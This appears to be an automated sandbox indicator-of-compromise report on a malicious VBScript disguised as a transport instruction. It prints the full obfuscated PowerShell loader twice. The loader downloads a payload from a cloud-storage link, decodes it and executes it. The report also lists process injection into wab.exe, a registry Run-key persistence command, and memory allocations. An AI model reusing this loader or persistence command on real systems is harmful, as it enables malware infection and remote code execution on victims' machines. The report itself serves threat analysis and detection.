IOC Report
TRANSPORT_INSTRUCTION_MR.vbs

TRANSPORT_INSTRUCTION_MR.vbs

ASCII text, with CRLF line terminators

initial sample

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSPORT_INSTRUCTION_MR.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"

C:\Windows\System32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"

http://pesterbdd.com/images/Pester.png

unknown

253F5000

trusted library allocation

page read and write

59B4000

trusted library allocation

page read and write

7365000

remote allocation

page execute and read and write

C025000

direct allocation

page execute and read and write

2541D000

trusted library allocation

page read and write

85F0000

direct allocation

page execute and read and write

26D56CF2000

trusted library allocation

page read and write